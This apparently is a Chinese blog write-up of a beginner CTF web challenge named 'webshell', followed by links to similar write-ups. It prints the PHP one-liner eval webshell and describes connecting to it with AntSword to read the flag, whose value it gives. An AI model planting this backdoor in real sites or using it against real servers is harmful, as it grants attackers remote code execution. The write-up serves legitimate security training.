攻防世界 web webshell

做题两分钟，工具两小时

题目描述：小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。

所谓的php一句话：<?php @eval($_POST['shell']);?>
这个是PHP最常见的一句话木马的源码，通过post木马程序来实现木马的植入，eval()函数把字符串按照PHP代码来计算

这题又涉及到新的web工具，Cknife （因为现在网络上菜刀的后门太多了，所以不推荐菜刀了）
这次我用的是antsword，antsword的github链接
这题时间主要花在了解题工具上面，做题倒是很快。

1.右键添加数据

2.把url和连接密码输进去
因为这题提示是webshell，所以推测密码是shell，一开始我把那个一句话php放进去发现不对…

3.找到flag.txt

cyberpeace{17b8c20c87ed744736dca537ddea2777}

攻防世界 web webshell相关推荐

攻防世界-----web知识点总结
WEB 一. 网页源代码的方式在地址栏前面加上view-source,如view-source:https://www.baidu.com 浏览器的设置菜单框中使用开发者工具,也可以查看网页源代码. ...
攻防世界-web新手区wp
攻防世界-web新手区wp view source robots backup cookie disabled_button weak auth simple php get_post xff_ref ...
攻防世界——web新手区（全解）
当前网络安全形式越来越严重,我国也越来越重视,现在国内乃至国际上各个网络攻防大赛层出不穷,但是练习平台却还是很稀缺,可以说目前网上能够练习的平台也就只有几家,大多数的院校它们有自己的练习平台但并不公开 ...
攻防世界web新手区（来自小白）*-*
鄙人是个纯纯的小白,这个博客也是给小白写的,不过大佬们也不会来查这些题的wp吧拍飞文章目录攻防世界WEB新手区(1--11) 第一题view_source 第二题robots 第三题backup ...
CTF:攻防世界web PART01
写在前面: 此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出.欢迎各位前来交流.(部分材料来源网络,若有侵权,立即删除) 攻防世界web PART01 baby_web Traini ...
攻防世界 web高手进阶区 9分题 favorite_number
前言继续ctf的旅程开始攻防世界web高手进阶区的9分题本文是favorite_number的writeup 解题过程进入界面简单的代码审计首先是个判断,既要数组强等于,又要首元素不等然 ...
攻防世界——web新手题
攻防世界----web新手题 1. robots 打开题目场景,发现与robots协议有关,上网搜索robots协议的内容: Robots协议(也称为爬虫协议.机器人协议等)的全称是"网络爬 ...
攻防世界 web高手进阶区 10分题 weiphp
前言继续ctf的旅程开始攻防世界web高手进阶区的10分题本文是weiphp的writeup 解题过程进入界面点击进入一个登陆界面没有注册那肯定得找源码了惯例源码+御剑发现git泄 ...
攻防世界Web第一天
攻防世界[Web]第一天 [Web]第一题解题步骤总结 [Web]第一题 X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了. 解题步骤第一:获取在线场景,进入浏览页面. ...

攻防世界 web webshell

攻防世界 web webshell相关推荐

最新文章

热门文章